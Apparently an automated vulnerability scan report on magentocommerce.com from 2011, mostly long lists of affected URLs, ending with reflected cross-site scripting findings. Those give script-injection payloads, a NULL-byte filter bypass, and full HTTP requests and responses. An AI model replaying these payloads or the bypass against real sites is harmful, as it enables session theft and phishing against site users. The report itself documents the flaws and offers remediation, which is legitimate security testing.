4.144. http://www.magentocommerce.com/services/training

4.145. http://www.magentocommerce.com/showcase

4.146. http://www.magentocommerce.com/sitemap/

4.147. http://www.magentocommerce.com/support/magento-user-guide-book

4.148. http://www.magentocommerce.com/support/magento_core_api

4.149. http://www.magentocommerce.com/support/overview

4.150. http://www.magentocommerce.com/svn

4.151. http://www.magentocommerce.com/system-requirements

4.152. http://www.magentocommerce.com/trackback/2509/

4.153. http://www.magentocommerce.com/trackback/2555/

4.154. http://www.magentocommerce.com/trackback/2556/

4.155. http://www.magentocommerce.com/trackback/2557/

4.156. http://www.magentocommerce.com/trackback/2571/

4.157. http://www.magentocommerce.com/trackback/323/

4.158. http://www.magentocommerce.com/trackback/383/

4.159. http://www.magentocommerce.com/trackback/446/

4.160. http://www.magentocommerce.com/trackback/561/

4.161. http://www.magentocommerce.com/trackback/625/

4.162. http://www.magentocommerce.com/trackback/713/

4.163. http://www.magentocommerce.com/trackback/892/

4.164. http://www.magentocommerce.com/translations

4.165. http://www.magentocommerce.com/ua

4.166. http://www.magentocommerce.com/vi

4.167. http://www.magentocommerce.com/virtual/download-magento/

4.168. http://www.magentocommerce.com/virtual/enterprise-register/

4.169. http://www.magentocommerce.com/whitepaper/

4.170. http://www.magentocommerce.com/wiki

5. Password field with autocomplete enabled

5.1. http://www.magentocommerce.com/

5.2. http://www.magentocommerce.com/!!!--

5.3. http://www.magentocommerce.com/answers/

5.4. http://www.magentocommerce.com/blog

5.5. http://www.magentocommerce.com/blog/comments/ebay-agrees-to-acquire-magento/

5.6. http://www.magentocommerce.com/blog/comments/magento-wins-best-new-open-source-project/

5.7. http://www.magentocommerce.com/blog/comments/magento-wins-best-of-open-source-enterprise-applications/

5.8. http://www.magentocommerce.com/boards/

5.9. http://www.magentocommerce.com/boards/viewforum/10252/

5.10. http://www.magentocommerce.com/boards/viewthread/1647/

5.11. http://www.magentocommerce.com/bug-tracking

5.12. http://www.magentocommerce.com/casestudies

5.13. http://www.magentocommerce.com/company/

5.14. http://www.magentocommerce.com/company/careers

5.15. http://www.magentocommerce.com/company/contact-us

5.16. http://www.magentocommerce.com/company/contact-us/

5.17. http://www.magentocommerce.com/company/contact-us/thank_you

5.18. http://www.magentocommerce.com/company/events

5.19. http://www.magentocommerce.com/company/events/

5.20. http://www.magentocommerce.com/company/inthepress

5.21. http://www.magentocommerce.com/company/inthepress/

5.22. http://www.magentocommerce.com/company/jobs/

5.23. http://www.magentocommerce.com/company/leadership

5.24. http://www.magentocommerce.com/company/leadership/

5.25. http://www.magentocommerce.com/company/media

5.26. http://www.magentocommerce.com/company/media/

5.27. http://www.magentocommerce.com/company/pci-compliance

5.28. http://www.magentocommerce.com/company/press-releases

5.29. http://www.magentocommerce.com/company/press-releases/

5.30. http://www.magentocommerce.com/company/privacy

5.31. http://www.magentocommerce.com/company/terms

5.32. http://www.magentocommerce.com/de

5.33. http://www.magentocommerce.com/demo

5.34. http://www.magentocommerce.com/design_guide

5.35. http://www.magentocommerce.com/dk

5.36. http://www.magentocommerce.com/download

5.37. http://www.magentocommerce.com/download/diff

5.38. http://www.magentocommerce.com/download/login_form

5.39. http://www.magentocommerce.com/download/release_notes

5.40. http://www.magentocommerce.com/es

5.41. http://www.magentocommerce.com/fr

5.42. http://www.magentocommerce.com/he

5.43. http://www.magentocommerce.com/hu

5.44. http://www.magentocommerce.com/imagine

5.45. http://www.magentocommerce.com/it

5.46. http://www.magentocommerce.com/jobs

5.47. http://www.magentocommerce.com/jobs/

5.48. http://www.magentocommerce.com/jobs/p/2/

5.49. http://www.magentocommerce.com/knowledge-base

5.50. http://www.magentocommerce.com/license/

5.51. http://www.magentocommerce.com/license/enterprise-edition

5.52. http://www.magentocommerce.com/lodger-footwear/

5.53. http://www.magentocommerce.com/lt

5.54. http://www.magentocommerce.com/magento-connect

5.55. http://www.magentocommerce.com/maps/online

5.56. http://www.magentocommerce.com/media/interviews

5.57. http://www.magentocommerce.com/media/interviews/alpedia/view

5.58. http://www.magentocommerce.com/media/interviews/bright-light-media/view

5.59. http://www.magentocommerce.com/media/interviews/buettenpapierfabrik-gmund/view

5.60. http://www.magentocommerce.com/media/interviews/jack-wolfskin/view

5.61. http://www.magentocommerce.com/media/interviews/liaison-dangereuse/view

5.62. http://www.magentocommerce.com/media/interviews/lodger-footwear/view

5.63. http://www.magentocommerce.com/media/interviews/man-junk/view

5.64. http://www.magentocommerce.com/media/interviews/nerdyshirts/view

5.65. http://www.magentocommerce.com/media/interviews/quadra-informatique-and-anneau-du-rhin-society/view

5.66. http://www.magentocommerce.com/media/interviews/sbs-broadcasting/view

5.67. http://www.magentocommerce.com/media/interviews/shoebacca/view

5.68. http://www.magentocommerce.com/media/interviews/signing-time/view

5.69. http://www.magentocommerce.com/media/interviews/stella-lena-ny/view

5.70. http://www.magentocommerce.com/media/interviews/timeout-online/view

5.71. http://www.magentocommerce.com/media/interviews/tvonics/view

5.72. http://www.magentocommerce.com/media/interviews/wander/view

5.73. http://www.magentocommerce.com/media/interviews/wearport/view

5.74. http://www.magentocommerce.com/media/interviews/wkf-communications/view

5.75. http://www.magentocommerce.com/media/screencasts

5.76. http://www.magentocommerce.com/media/screencasts/adding-related-products/view

5.77. http://www.magentocommerce.com/media/screencasts/community-groups/view

5.78. http://www.magentocommerce.com/media/screencasts/configurable-products/view

5.79. http://www.magentocommerce.com/media/screencasts/configuring-tier-pricing/view

5.80. http://www.magentocommerce.com/media/screencasts/content-staging-and-merging/view

5.81. http://www.magentocommerce.com/media/screencasts/currency/view

5.82. http://www.magentocommerce.com/media/screencasts/data-exporting/view

5.83. http://www.magentocommerce.com/media/screencasts/designers-guide-1/view

5.84. http://www.magentocommerce.com/media/screencasts/gift-certificates-cards/view

5.85. http://www.magentocommerce.com/media/screencasts/grouped-products/view

5.86. http://www.magentocommerce.com/media/screencasts/introducing-the-magento-enterprise-edition/view

5.87. http://www.magentocommerce.com/media/screencasts/landing-pages/view

5.88. http://www.magentocommerce.com/media/screencasts/permissions/view

5.89. http://www.magentocommerce.com/media/screencasts/private-sales-including-events-invitations-and-category-access-permissions/view

5.90. http://www.magentocommerce.com/media/screencasts/product-comparison/view

5.91. http://www.magentocommerce.com/media/screencasts/search/view

5.92. http://www.magentocommerce.com/media/screencasts/single-page-checkout-guest-checkout/view

5.93. http://www.magentocommerce.com/media/screencasts/static-blocks/view

5.94. http://www.magentocommerce.com/media/screencasts/transactional-email/view

5.95. http://www.magentocommerce.com/media/screencasts/upsells/view

5.96. http://www.magentocommerce.com/media/screencasts/working-with-paypal/view

5.97. http://www.magentocommerce.com/media/screenshots

5.98. http://www.magentocommerce.com/media/videos

5.99. http://www.magentocommerce.com/media/videos/

5.100. http://www.magentocommerce.com/media/webinars

5.101. http://www.magentocommerce.com/media/webinars/

5.102. http://www.magentocommerce.com/partners/

5.103. http://www.magentocommerce.com/partners/find/bronze-solution/

5.104. http://www.magentocommerce.com/partners/find/hosting-partners/

5.105. http://www.magentocommerce.com/partners/find/industry-partners/

5.106. http://www.magentocommerce.com/partners/find/solution-partners/

5.107. http://www.magentocommerce.com/partners/hosting-partners

5.108. http://www.magentocommerce.com/partners/industry-partners

5.109. http://www.magentocommerce.com/partners/solution-partners

5.110. http://www.magentocommerce.com/partners/view/117/gorilla

5.111. http://www.magentocommerce.com/pl

5.112. http://www.magentocommerce.com/product/community-edition

5.113. http://www.magentocommerce.com/product/compare

5.114. http://www.magentocommerce.com/product/deployed-solutions

5.115. http://www.magentocommerce.com/product/emerging-business

5.116. http://www.magentocommerce.com/product/enterprise-community-faqs

5.117. http://www.magentocommerce.com/product/enterprise-edition

5.118. http://www.magentocommerce.com/product/enterprise-level

5.119. http://www.magentocommerce.com/product/faq

5.120. http://www.magentocommerce.com/product/features

5.121. http://www.magentocommerce.com/product/hosted-solutions

5.122. http://www.magentocommerce.com/product/magento-go

5.123. http://www.magentocommerce.com/product/magento-zend

5.124. http://www.magentocommerce.com/product/mobile

5.125. http://www.magentocommerce.com/product/professional-edition

5.126. http://www.magentocommerce.com/products/checkout/cart/

5.127. http://www.magentocommerce.com/products/job-post.html

5.128. http://www.magentocommerce.com/pt_BR

5.129. http://www.magentocommerce.com/roadmap/issue-roadmap

5.130. http://www.magentocommerce.com/ru

5.131. http://www.magentocommerce.com/services

5.132. http://www.magentocommerce.com/services/

5.133. http://www.magentocommerce.com/services/course-pricing

5.134. http://www.magentocommerce.com/services/course-schedule

5.135. http://www.magentocommerce.com/services/descriptions

5.136. http://www.magentocommerce.com/services/professional-services

5.137. http://www.magentocommerce.com/services/register-for-training

5.138. http://www.magentocommerce.com/services/testimonials

5.139. http://www.magentocommerce.com/services/training

5.140. http://www.magentocommerce.com/showcase

5.141. http://www.magentocommerce.com/sitemap/

5.142. http://www.magentocommerce.com/support/magento-user-guide-book

5.143. http://www.magentocommerce.com/support/magento_core_api

5.144. http://www.magentocommerce.com/support/overview

5.145. http://www.magentocommerce.com/svn

5.146. http://www.magentocommerce.com/system-requirements

5.147. http://www.magentocommerce.com/translations

5.148. http://www.magentocommerce.com/ua

5.149. http://www.magentocommerce.com/vi

5.150. http://www.magentocommerce.com/virtual/download-magento/

5.151. http://www.magentocommerce.com/virtual/enterprise-register/

5.152. http://www.magentocommerce.com/whitepaper/

6. Cross-domain POST

6.1. http://www.magentocommerce.com/

6.2. http://www.magentocommerce.com/!!!--

6.3. http://www.magentocommerce.com/answers/

6.4. http://www.magentocommerce.com/blog

6.5. http://www.magentocommerce.com/blog

6.6. http://www.magentocommerce.com/blog/comments/ebay-agrees-to-acquire-magento/

6.7. http://www.magentocommerce.com/blog/comments/magento-wins-best-new-open-source-project/

6.8. http://www.magentocommerce.com/blog/comments/magento-wins-best-of-open-source-enterprise-applications/

6.9. http://www.magentocommerce.com/boards/

6.10. http://www.magentocommerce.com/boards/viewforum/10252/

6.11. http://www.magentocommerce.com/boards/viewthread/1647/

6.12. http://www.magentocommerce.com/bug-tracking

6.13. http://www.magentocommerce.com/company/

6.14. http://www.magentocommerce.com/company/careers

6.15. http://www.magentocommerce.com/company/contact-us

6.16. http://www.magentocommerce.com/company/contact-us

6.17. http://www.magentocommerce.com/company/contact-us/

6.18. http://www.magentocommerce.com/company/contact-us/

6.19. http://www.magentocommerce.com/company/contact-us/thank_you

6.20. http://www.magentocommerce.com/company/events

6.21. http://www.magentocommerce.com/company/events/

6.22. http://www.magentocommerce.com/company/inthepress

6.23. http://www.magentocommerce.com/company/inthepress/

6.24. http://www.magentocommerce.com/company/jobs/

6.25. http://www.magentocommerce.com/company/leadership

6.26. http://www.magentocommerce.com/company/leadership/

6.27. http://www.magentocommerce.com/company/media

6.28. http://www.magentocommerce.com/company/media/

6.29. http://www.magentocommerce.com/company/pci-compliance

6.30. http://www.magentocommerce.com/company/press-releases

6.31. http://www.magentocommerce.com/company/press-releases/

6.32. http://www.magentocommerce.com/company/privacy

6.33. http://www.magentocommerce.com/company/terms

6.34. http://www.magentocommerce.com/de

6.35. http://www.magentocommerce.com/demo

6.36. http://www.magentocommerce.com/design_guide

6.37. http://www.magentocommerce.com/dk

6.38. http://www.magentocommerce.com/download

6.39. http://www.magentocommerce.com/download/diff

6.40. http://www.magentocommerce.com/download/release_notes

6.41. http://www.magentocommerce.com/es

6.42. http://www.magentocommerce.com/fr

6.43. http://www.magentocommerce.com/he

6.44. http://www.magentocommerce.com/hu

6.45. http://www.magentocommerce.com/imagine

6.46. http://www.magentocommerce.com/it

6.47. http://www.magentocommerce.com/jobs

6.48. http://www.magentocommerce.com/jobs/

6.49. http://www.magentocommerce.com/jobs/p/2/

6.50. http://www.magentocommerce.com/knowledge-base

6.51. http://www.magentocommerce.com/license/

6.52. http://www.magentocommerce.com/license/enterprise-edition

6.53. http://www.magentocommerce.com/lodger-footwear/

6.54. http://www.magentocommerce.com/lt

6.55. http://www.magentocommerce.com/magento-connect

6.56. http://www.magentocommerce.com/magento-connect

6.57. http://www.magentocommerce.com/maps/online

6.58. http://www.magentocommerce.com/media/interviews

6.59. http://www.magentocommerce.com/media/interviews/alpedia/view

6.60. http://www.magentocommerce.com/media/interviews/bright-light-media/view

6.61. http://www.magentocommerce.com/media/interviews/buettenpapierfabrik-gmund/view

6.62. http://www.magentocommerce.com/media/interviews/jack-wolfskin/view

6.63. http://www.magentocommerce.com/media/interviews/liaison-dangereuse/view

6.64. http://www.magentocommerce.com/media/interviews/lodger-footwear/view

6.65. http://www.magentocommerce.com/media/interviews/man-junk/view

6.66. http://www.magentocommerce.com/media/interviews/nerdyshirts/view

6.67. http://www.magentocommerce.com/media/interviews/quadra-informatique-and-anneau-du-rhin-society/view

6.68. http://www.magentocommerce.com/media/interviews/sbs-broadcasting/view

6.69. http://www.magentocommerce.com/media/interviews/shoebacca/view

6.70. http://www.magentocommerce.com/media/interviews/signing-time/view

6.71. http://www.magentocommerce.com/media/interviews/stella-lena-ny/view

6.72. http://www.magentocommerce.com/media/interviews/timeout-online/view

6.73. http://www.magentocommerce.com/media/interviews/tvonics/view

6.74. http://www.magentocommerce.com/media/interviews/wander/view

6.75. http://www.magentocommerce.com/media/interviews/wearport/view

6.76. http://www.magentocommerce.com/media/interviews/wkf-communications/view

6.77. http://www.magentocommerce.com/media/screencasts

6.78. http://www.magentocommerce.com/media/screencasts/adding-related-products/view

6.79. http://www.magentocommerce.com/media/screencasts/community-groups/view

6.80. http://www.magentocommerce.com/media/screencasts/configurable-products/view

6.81. http://www.magentocommerce.com/media/screencasts/configuring-tier-pricing/view

6.82. http://www.magentocommerce.com/media/screencasts/content-staging-and-merging/view

6.83. http://www.magentocommerce.com/media/screencasts/currency/view

6.84. http://www.magentocommerce.com/media/screencasts/data-exporting/view

6.85. http://www.magentocommerce.com/media/screencasts/designers-guide-1/view

6.86. http://www.magentocommerce.com/media/screencasts/gift-certificates-cards/view

6.87. http://www.magentocommerce.com/media/screencasts/grouped-products/view

6.88. http://www.magentocommerce.com/media/screencasts/introducing-the-magento-enterprise-edition/view

6.89. http://www.magentocommerce.com/media/screencasts/landing-pages/view

6.90. http://www.magentocommerce.com/media/screencasts/permissions/view

6.91. http://www.magentocommerce.com/media/screencasts/private-sales-including-events-invitations-and-category-access-permissions/view

6.92. http://www.magentocommerce.com/media/screencasts/product-comparison/view

6.93. http://www.magentocommerce.com/media/screencasts/search/view

6.94. http://www.magentocommerce.com/media/screencasts/single-page-checkout-guest-checkout/view

6.95. http://www.magentocommerce.com/media/screencasts/static-blocks/view

6.96. http://www.magentocommerce.com/media/screencasts/transactional-email/view

6.97. http://www.magentocommerce.com/media/screencasts/upsells/view

6.98. http://www.magentocommerce.com/media/screencasts/working-with-paypal/view

6.99. http://www.magentocommerce.com/media/screenshots

6.100. http://www.magentocommerce.com/media/videos

6.101. http://www.magentocommerce.com/media/videos/

6.102. http://www.magentocommerce.com/media/webinars

6.103. http://www.magentocommerce.com/media/webinars/

6.104. http://www.magentocommerce.com/partners/

6.105. http://www.magentocommerce.com/partners/find/bronze-solution/

6.106. http://www.magentocommerce.com/partners/find/hosting-partners/

6.107. http://www.magentocommerce.com/partners/find/industry-partners/

6.108. http://www.magentocommerce.com/partners/find/solution-partners/

6.109. http://www.magentocommerce.com/partners/hosting-partners

6.110. http://www.magentocommerce.com/partners/industry-partners

6.111. http://www.magentocommerce.com/partners/solution-partners

6.112. http://www.magentocommerce.com/partners/view/117/gorilla

6.113. http://www.magentocommerce.com/pl

6.114. http://www.magentocommerce.com/product/community-edition

6.115. http://www.magentocommerce.com/product/compare

6.116. http://www.magentocommerce.com/product/deployed-solutions

6.117. http://www.magentocommerce.com/product/emerging-business

6.118. http://www.magentocommerce.com/product/enterprise-community-faqs

6.119. http://www.magentocommerce.com/product/enterprise-edition

6.120. http://www.magentocommerce.com/product/enterprise-level

6.121. http://www.magentocommerce.com/product/faq

6.122. http://www.magentocommerce.com/product/features

6.123. http://www.magentocommerce.com/product/hosted-solutions

6.124. http://www.magentocommerce.com/product/magento-go

6.125. http://www.magentocommerce.com/product/magento-zend

6.126. http://www.magentocommerce.com/product/mobile

6.127. http://www.magentocommerce.com/product/professional-edition

6.128. http://www.magentocommerce.com/products/checkout/cart/

6.129. http://www.magentocommerce.com/products/job-post.html

6.130. http://www.magentocommerce.com/products/skin/frontend/enterprise/mc/js/scripts.js

6.131. http://www.magentocommerce.com/pt_BR

6.132. http://www.magentocommerce.com/roadmap/issue-roadmap

6.133. http://www.magentocommerce.com/ru

6.134. http://www.magentocommerce.com/services

6.135. http://www.magentocommerce.com/services/

6.136. http://www.magentocommerce.com/services/contact-us-popup

6.137. http://www.magentocommerce.com/services/course-pricing

6.138. http://www.magentocommerce.com/services/course-schedule

6.139. http://www.magentocommerce.com/services/descriptions

6.140. http://www.magentocommerce.com/services/professional-services

6.141. http://www.magentocommerce.com/services/register-for-training

6.142. http://www.magentocommerce.com/services/testimonials

6.143. http://www.magentocommerce.com/services/training

6.144. http://www.magentocommerce.com/showcase

6.145. http://www.magentocommerce.com/sitemap/

6.146. http://www.magentocommerce.com/support/magento-user-guide-book

6.147. http://www.magentocommerce.com/support/magento_core_api

6.148. http://www.magentocommerce.com/support/overview

6.149. http://www.magentocommerce.com/svn

6.150. http://www.magentocommerce.com/system-requirements

6.151. http://www.magentocommerce.com/translations

6.152. http://www.magentocommerce.com/ua

6.153. http://www.magentocommerce.com/vi

6.154. http://www.magentocommerce.com/virtual/download-magento/

6.155. http://www.magentocommerce.com/virtual/enterprise-register/

6.156. http://www.magentocommerce.com/whitepaper/

7. Cross-domain script include

7.1. http://www.magentocommerce.com/blog

7.2. http://www.magentocommerce.com/blog/comments/ebay-agrees-to-acquire-magento/

7.3. http://www.magentocommerce.com/blog/comments/magento-wins-best-new-open-source-project/

7.4. http://www.magentocommerce.com/blog/comments/magento-wins-best-of-open-source-enterprise-applications/

7.5. http://www.magentocommerce.com/download

7.6. http://www.magentocommerce.com/magento-connect

7.7. http://www.magentocommerce.com/maps/online

7.8. http://www.magentocommerce.com/services/contact-us-popup

8. Email addresses disclosed

8.1. http://www.magentocommerce.com/boards/

8.2. http://www.magentocommerce.com/company/careers

8.3. http://www.magentocommerce.com/company/jobs/

8.4. http://www.magentocommerce.com/company/media

8.5. http://www.magentocommerce.com/company/media/

8.6. http://www.magentocommerce.com/company/privacy

8.7. http://www.magentocommerce.com/de

8.8. http://www.magentocommerce.com/es

8.9. http://www.magentocommerce.com/fr

8.10. http://www.magentocommerce.com/it

8.11. http://www.magentocommerce.com/js/rating.js

8.12. http://www.magentocommerce.com/js/tracklinks.js

8.13. http://www.magentocommerce.com/pl

8.14. http://www.magentocommerce.com/products/js/mage/cookies.js

8.15. http://www.magentocommerce.com/products/js/mage/translate.js

8.16. http://www.magentocommerce.com/products/js/scriptaculous/controls.js

8.17. http://www.magentocommerce.com/products/js/scriptaculous/dragdrop.js

8.18. http://www.magentocommerce.com/products/js/varien/form.js

8.19. http://www.magentocommerce.com/products/js/varien/js.js

8.20. http://www.magentocommerce.com/products/skin/frontend/enterprise/mc/css/print.css

8.21. http://www.magentocommerce.com/products/skin/frontend/enterprise/mc/css/styles.css

8.22. http://www.magentocommerce.com/products/skin/frontend/enterprise/mc/css/widgets.css

8.23. http://www.magentocommerce.com/products/skin/frontend/enterprise/mc/js/enterprise/catalogevent.js

8.24. http://www.magentocommerce.com/products/skin/frontend/enterprise/mc/js/scripts.js

8.25. http://www.magentocommerce.com/ru

8.26. http://www.magentocommerce.com/ua

9. Social security numbers disclosed

10. Credit card numbers disclosed

11. Robots.txt file

12. HTML does not specify charset

12.1. http://www.magentocommerce.com/images/avatars/uploads/avatar_19608.png

12.2. http://www.magentocommerce.com/img/btn_submit.gif

12.3. http://www.magentocommerce.com/img/icon_post_comment.gif

12.4. http://www.magentocommerce.com/img/magento_dnld_rr.gif

13. Content type incorrectly stated


1. Cross-site scripting (reflected)  next
There are 54 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

1.1. http://www.magentocommerce.com/answers/ [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /answers/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %005e56c"><script>alert(1)</script>abbcd2c92b6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5e56c"><script>alert(1)</script>abbcd2c92b6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /answers/?%005e56c"><script>alert(1)</script>abbcd2c92b6=1 HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:13:35 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.2.17
Set-Cookie: exp_last_activity=1313176414; expires=Sat, 11-Aug-2012 15:13:34 GMT; path=/; domain=magentocommerce.com
Set-Cookie: Answers=deleted; expires=Thu, 12-Aug-2010 15:13:34 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: Answers=deleted; expires=Thu, 12-Aug-2010 15:13:34 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: Answers=-1-1313334815%7C311b13ed5fdebae6aafa387d0b84b492%7C1313162015%7C-1%7C1313334815; expires=Fri, 12-Aug-2011 19:13:35 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: Answers-Volatile=-1-1313334815%7C311b13ed5fdebae6aafa387d0b84b492%7C1313162015%7C-1%7C1313334815; expires=Fri, 12-Aug-2011 19:13:35 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: Answers=-1-1313334815%7C311b13ed5fdebae6aafa387d0b84b492%7C1313162015%7C-1%7C1313334815; expires=Fri, 12-Aug-2011 19:13:35 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: Answers-Volatile=-1-1313334815%7C311b13ed5fdebae6aafa387d0b84b492%7C1313162015%7C-1%7C1313334815; expires=Fri, 12-Aug-2011 19:13:35 GMT; path=/; domain=www.magentocommerce.com
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-Garden-Version: Vanilla 2.0.17.9
Last-Modified: Fri, 12 Aug 2011 15:13:35 GMT
Content-Length: 54295

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-ca">
<head>
   <title>Magento Answer
...[SNIP]...
<input type="hidden" name="login[back_url]" value="/answers/?%005e56c"><script>alert(1)</script>abbcd2c92b6=1">
...[SNIP]...
1.2. http://www.magentocommerce.com/boards/viewforum/10252/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /boards/viewforum/10252/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f656"><script>alert(1)</script>687b2c4ddbf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boards/viewforum/102523f656"><script>alert(1)</script>687b2c4ddbf/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:16:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176573; expires=Sat, 11-Aug-2012 15:16:13 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:16:13 GMT
Content-Length: 34546

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<input type="hidden" name="login[back_url]" value="http://www.magentocommerce.com/boards/viewforum/102523f656"><script>alert(1)</script>687b2c4ddbf" />
...[SNIP]...
1.3. http://www.magentocommerce.com/media/screencasts/adding-related-products/view [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/adding-related-products/view

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1a42"><script>alert(1)</script>cfcde977640 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/screencasts/adding-related-productsc1a42"><script>alert(1)</script>cfcde977640/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:37 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176237; expires=Sat, 11-Aug-2012 15:10:37 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:37 GMT
Content-Length: 33506

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/adding-related-productsc1a42"><script>alert(1)</script>cfcde977640/view">
...[SNIP]...
1.4. http://www.magentocommerce.com/media/screencasts/adding-related-products/view [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/adding-related-products/view

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %002f335"><script>alert(1)</script>878d14e3ada was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2f335"><script>alert(1)</script>878d14e3ada in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /media/screencasts/adding-related-products/view?%002f335"><script>alert(1)</script>878d14e3ada=1 HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:24 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
